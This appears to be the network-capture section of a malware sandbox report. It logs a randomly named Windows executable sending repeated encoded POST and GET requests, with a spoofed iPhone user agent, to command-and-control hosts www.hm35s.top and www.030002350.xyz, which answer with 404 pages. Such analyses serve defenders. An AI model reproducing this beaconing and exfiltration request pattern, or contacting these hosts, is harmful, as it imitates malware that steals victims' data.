                                                                                                            Data Ascii: YdDTnh=t5itM9IXjlQHPTwZ/j3kkIxKA6jLE68xrp9NDzMiGHgLu+tjxqFTAs/qrIGbJkEq2JP3tH+6N5pLmhkdL1OVJrHXNqQMPnTB4MQQoL0FBgW8SK18KKYrqr4m05SWn6YHFUYQMw78++gDGUB4QRN2StQLnmfPafK9SK4IBt0mhtK1EHvPqE1bWzBQvuik336hFg==
                                                                                                            Dec 12, 2024 21:49:22.730657101 CET312INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:22 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 148
                                                                                                            Connection: close
                                                                                                            ETag: "66a5f968-94"
                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.449959154.23.184.95805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:23.857618093 CET780OUTPOST /ebw6/ HTTP/1.1
                                                                                                            Host: www.hm35s.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.hm35s.top
                                                                                                            Referer: http://www.hm35s.top/ebw6/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 223
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 74 35 69 74 4d 39 49 58 6a 6c 51 48 50 7a 41 5a 2b 41 76 6b 6d 6f 78 4a 50 61 6a 4c 4e 61 38 31 72 70 68 4e 44 79 5a 76 48 31 45 4c 67 38 31 6a 72 6f 74 54 4e 4d 2f 71 7a 34 47 65 47 45 45 68 32 4a 43 49 74 43 65 36 4e 34 4e 4c 6d 6a 38 64 4b 43 53 57 49 37 48 52 42 4b 51 4f 58 48 54 42 34 4d 51 51 6f 4c 78 65 42 68 79 38 52 37 46 38 4c 72 59 71 67 4c 34 6e 39 5a 53 57 31 4b 59 4c 46 55 59 49 4d 30 61 72 2b 38 59 44 47 55 52 34 52 41 4e 35 5a 74 51 46 6a 6d 65 71 61 73 36 77 49 36 70 77 47 2f 70 49 6a 2f 43 51 49 68 69 56 37 31 55 4d 45 7a 6c 6a 79 70 72 51 36 30 48 6f 65 6b 55 34 61 65 62 74 6d 59 66 45 67 34 75 6f 51 54 41 5a 42 36 77 3d
                                                                                                            Data Ascii: YdDTnh=t5itM9IXjlQHPzAZ+AvkmoxJPajLNa81rphNDyZvH1ELg81jrotTNM/qz4GeGEEh2JCItCe6N4NLmj8dKCSWI7HRBKQOXHTB4MQQoLxeBhy8R7F8LrYqgL4n9ZSW1KYLFUYIM0ar+8YDGUR4RAN5ZtQFjmeqas6wI6pwG/pIj/CQIhiV71UMEzljyprQ60HoekU4aebtmYfEg4uoQTAZB6w=
                                                                                                            Dec 12, 2024 21:49:25.373651028 CET312INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:25 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 148
                                                                                                            Connection: close
                                                                                                            ETag: "66a5f968-94"
                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.449967154.23.184.95805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:26.526307106 CET10862OUTPOST /ebw6/ HTTP/1.1
                                                                                                            Host: www.hm35s.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.hm35s.top
                                                                                                            Referer: http://www.hm35s.top/ebw6/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 10303
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 74 35 69 74 4d 39 49 58 6a 6c 51 48 50 7a 41 5a 2b 41 76 6b 6d 6f 78 4a 50 61 6a 4c 4e 61 38 31 72 70 68 4e 44 79 5a 76 48 31 4d 4c 67 50 39 6a 6f 50 78 54 4d 4d 2f 71 36 59 47 66 47 45 45 47 32 49 71 4d 74 43 44 50 4e 37 6c 4c 38 41 30 64 66 47 6d 57 47 4c 48 52 63 36 51 44 50 6e 53 62 34 4d 41 63 6f 4c 68 65 42 68 79 38 52 34 64 38 4e 36 59 71 6d 4c 34 6d 30 35 53 61 6e 36 59 6e 46 55 41 59 4d 79 47 37 2b 73 34 44 47 77 4e 34 54 79 31 35 62 4e 51 48 76 47 65 49 61 73 33 77 49 37 45 4a 47 2b 63 54 6a 39 65 51 59 32 54 72 6d 47 49 73 54 44 6b 34 6b 5a 37 64 35 45 37 46 59 31 45 33 58 38 71 79 79 37 58 61 71 59 2f 76 56 42 5a 59 61 39 31 76 30 37 59 6b 49 74 36 6a 4d 6d 79 39 65 66 33 69 54 4b 30 47 46 42 45 33 6e 72 4f 2f 66 2f 4d 77 6d 63 38 46 47 79 38 32 7a 7a 35 44 79 30 39 50 47 6f 30 65 32 6e 77 5a 39 47 63 42 6b 58 4f 4a 6c 66 34 37 78 56 6c 71 49 78 4f 69 4c 7a 4a 65 34 47 70 2b 69 31 65 35 46 44 71 64 72 4c 55 56 52 48 6c 50 50 64 52 30 69 33 6f 70 63 6e 41 76 31 71 63 [TRUNCATED]
                                                                                                            Data Ascii: YdDTnh=t5itM9IXjlQHPzAZ+AvkmoxJPajLNa81rphNDyZvH1MLgP9joPxTMM/q6YGfGEEG2IqMtCDPN7lL8A0dfGmWGLHRc6QDPnSb4MAcoLheBhy8R4d8N6YqmL4m05San6YnFUAYMyG7+s4DGwN4Ty15bNQHvGeIas3wI7EJG+cTj9eQY2TrmGIsTDk4kZ7d5E7FY1E3X8qyy7XaqY/vVBZYa91v07YkIt6jMmy9ef3iTK0GFBE3nrO/f/Mwmc8FGy82zz5Dy09PGo0e2nwZ9GcBkXOJlf47xVlqIxOiLzJe4Gp+i1e5FDqdrLUVRHlPPdR0i3opcnAv1qcmAJF9lk4nCRxnS59+gAJ87YykkqUVOYP4JqaTS7fqBrrjg6TXsvxGCHDypDYyaLiHeTzNldKSyf0Wz1yL/67XY5jlLEsdzpaSY4UkKXW1AqmxoKRhiwANsh0ae3hW+IrkwDJFB7tuebIqKk9PNgEz/VsHUwQU1NKzkwC125KqenKqOXk4k+YsjQjRS4TQu8V8SbAcXmtGR5R4SPnZ2TPlfFXbFUb2NwwZQ68CCgXk8VXRd7YCL4Yfajztv4X8z6UkN4dN6mBFRJ1T80miAO50q9bEutJ2WrDcXNTajcZjyqUUFy9s50lMhUfehHAhye7yu6ulYGlvv6bC4v2rYaj413FniDGMsUsNcykf+jwWndJlkp4YXnAZib0hHEUwHc4g8eeMfnl9Yec3Vp6ltMwYabWC1xAG8OBN/cX7gWrGGg5cF/i4y3thlXQpnergei8C4pZtM5LshlsT/pwbQ9Fo0VAsJFG7s8ClSa49f2GmT5nxPztz9Iq2A2yt9Qfkp0B9HtAm1Eg7PNYQ492rseXt94PqLFrR3OrQ6IMIDMcG6JikFqajJmOUD7DkDajCCNySjRJE151b3uItlCCE2Y16xkZVVp2g0+yOShxpHIlzzSWRdoYkgWhYWH8fNos7akIhHoaErZLtkUbokP1lyuSl0t63zWqzeXIAn [TRUNCATED]
                                                                                                            Dec 12, 2024 21:49:28.083762884 CET312INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:27 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 148
                                                                                                            Connection: close
                                                                                                            ETag: "66a5f968-94"
                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.449973154.23.184.95805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:29.204853058 CET506OUTGET /ebw6/?YdDTnh=g7KNPNtXo04gJA8d7gjB2LBtOKC/EZQd0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCYDBDYgNJRKGsOkt2pAFFHXhbKxNJb1Qwag=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1
                                                                                                            Host: www.hm35s.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Dec 12, 2024 21:49:30.751588106 CET312INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:30 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 148
                                                                                                            Connection: close
                                                                                                            ETag: "66a5f968-94"
                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.449990161.97.142.144805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:36.423399925 CET772OUTPOST /1a7n/ HTTP/1.1
                                                                                                            Host: www.030002350.xyz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.030002350.xyz
                                                                                                            Referer: http://www.030002350.xyz/1a7n/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 66 78 38 56 6d 49 63 4c 73 54 59 6d 2b 42 79 53 74 6c 46 52 4e 33 6e 4c 6a 58 47 50 55 67 7a 78 7a 6e 31 33 2b 4e 65 49 67 41 66 36 79 32 41 31 61 6c 4c 44 39 65 48 46 72 4f 74 69 6f 6e 67 53 32 44 74 33 6b 64 39 69 30 71 6b 6b 48 62 68 74 33 51 66 36 45 33 2f 48 36 7a 66 32 35 73 7a 52 6d 65 79 66 7a 63 70 66 6f 50 67 46 34 68 68 6d 37 46 48 62 2b 2f 33 33 6e 46 38 30 56 6b 50 77 38 55 46 66 6e 39 33 4d 48 73 38 7a 47 43 32 38 54 59 37 4b 36 5a 61 54 71 36 30 65 55 67 79 71 39 4c 52 37 62 63 63 7a 48 76 35 6e 58 35 30 38 6f 61 6c 63 2b 74 7a 6a 68 34 76 32 5a 65 4f 35 58 67 3d 3d
                                                                                                            Data Ascii: YdDTnh=fx8VmIcLsTYm+ByStlFRN3nLjXGPUgzxzn13+NeIgAf6y2A1alLD9eHFrOtiongS2Dt3kd9i0qkkHbht3Qf6E3/H6zf25szRmeyfzcpfoPgF4hhm7FHb+/33nF80VkPw8UFfn93MHs8zGC28TY7K6ZaTq60eUgyq9LR7bcczHv5nX508oalc+tzjh4v2ZeO5Xg==
                                                                                                            Dec 12, 2024 21:49:37.743752003 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:37 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: W/"66cce1df-b96"
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                            Dec 12, 2024 21:49:37.743796110 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.449997161.97.142.144805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:39.090007067 CET792OUTPOST /1a7n/ HTTP/1.1
                                                                                                            Host: www.030002350.xyz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.030002350.xyz
                                                                                                            Referer: http://www.030002350.xyz/1a7n/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 223
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 66 78 38 56 6d 49 63 4c 73 54 59 6d 78 42 43 53 2b 53 52 52 63 58 6e 4d 74 33 47 50 65 41 7a 31 7a 6e 4a 33 2b 4d 72 56 67 32 76 36 79 57 77 31 5a 6b 4c 44 7a 2b 48 46 6c 75 74 6a 31 58 67 6e 32 44 68 56 6b 63 78 69 30 72 45 6b 48 61 52 74 33 44 48 35 46 6e 2f 4a 79 54 66 30 33 4d 7a 52 6d 65 79 66 7a 59 4a 35 6f 50 34 46 34 52 78 6d 36 67 7a 61 39 2f 33 30 75 6c 38 30 44 55 50 30 38 55 46 39 6e 34 76 32 48 76 45 7a 47 48 4b 38 54 4a 37 4a 78 5a 61 5a 33 71 30 50 63 43 48 56 79 72 77 52 57 36 30 6d 4e 4d 4a 69 53 2f 35 6d 35 72 45 4c 73 74 58 51 38 2f 6d 43 55 64 7a 77 4d 71 70 6b 65 51 53 61 6a 54 6b 43 6f 4b 6c 58 2f 2b 39 39 63 74 41 3d
                                                                                                            Data Ascii: YdDTnh=fx8VmIcLsTYmxBCS+SRRcXnMt3GPeAz1znJ3+MrVg2v6yWw1ZkLDz+HFlutj1Xgn2DhVkcxi0rEkHaRt3DH5Fn/JyTf03MzRmeyfzYJ5oP4F4Rxm6gza9/30ul80DUP08UF9n4v2HvEzGHK8TJ7JxZaZ3q0PcCHVyrwRW60mNMJiS/5m5rELstXQ8/mCUdzwMqpkeQSajTkCoKlX/+99ctA=
                                                                                                            Dec 12, 2024 21:49:40.369549990 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:40 GMT
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            ETag: W/"66cce1df-b96"
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                            Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                            Dec 12, 2024 21:49:40.369642973 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                            Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.450004161.97.142.144805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:41.757076025 CET10874OUTPOST /1a7n/ HTTP/1.1
                                                                                                            Host: www.030002350.xyz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.030002350.xyz
                                                                                                            Referer: http://www.030002350.xyz/1a7n/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 10303
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 66 78 38 56 6d 49 63 4c 73 54 59 6d 78 42 43 53 2b 53 52 52 63 58 6e 4d 74 33 47 50 65 41 7a 31 7a 6e 4a 33 2b 4d 72 56 67 32 6e 36 7a 6c 34 31 66 33 7a 44 77 2b 48 46 74 4f 74 6d 31 58 67 2b 32 44 35 52 6b 63 4e 59 30 75 41 6b 42 49 5a 74 67 47 72 35 50 6e 2f 4a 2b 7a 66 33 35 73 7a 45 6d 65 69 44 7a 63 6c 35 6f 50 34 46 34 54 35 6d 73 46 48 61 37 2f 33 33 6e 46 39 31 56 6b 50 63 38 56 73 66 6e 34 6a 63 48 65 6b 7a 47 6e 36 38 53 2f 48 4a 7a 35 61 66 30 71 31 53 63 43 62 30 79 6f 55 33 57 2b 38 4d 4e 4c 35 69 54 37 55 74 74 49 59 67 79 37 47 50 67 66 47 48 58 73 66 38 4b 36 64 78 51 53 43 45 35 7a 73 71 6e 4c 77 49 71 50 6c 67 44 61 50 6f 4f 39 39 4d 73 56 48 66 38 33 70 34 69 75 52 43 73 53 58 65 2f 63 37 57 63 6b 30 61 39 51 45 48 49 59 66 6c 6a 77 32 47 49 67 61 4d 71 51 56 41 61 4f 62 53 33 6e 6b 49 54 4b 74 46 50 77 46 62 44 4f 39 2b 4c 4c 68 44 44 54 48 7a 73 5a 36 70 32 73 53 65 79 72 63 69 42 33 44 58 69 67 37 66 6b 2f 58 39 57 48 72 46 54 56 47 48 56 6f 2b 52 2f 38 31 [TRUNCATED]
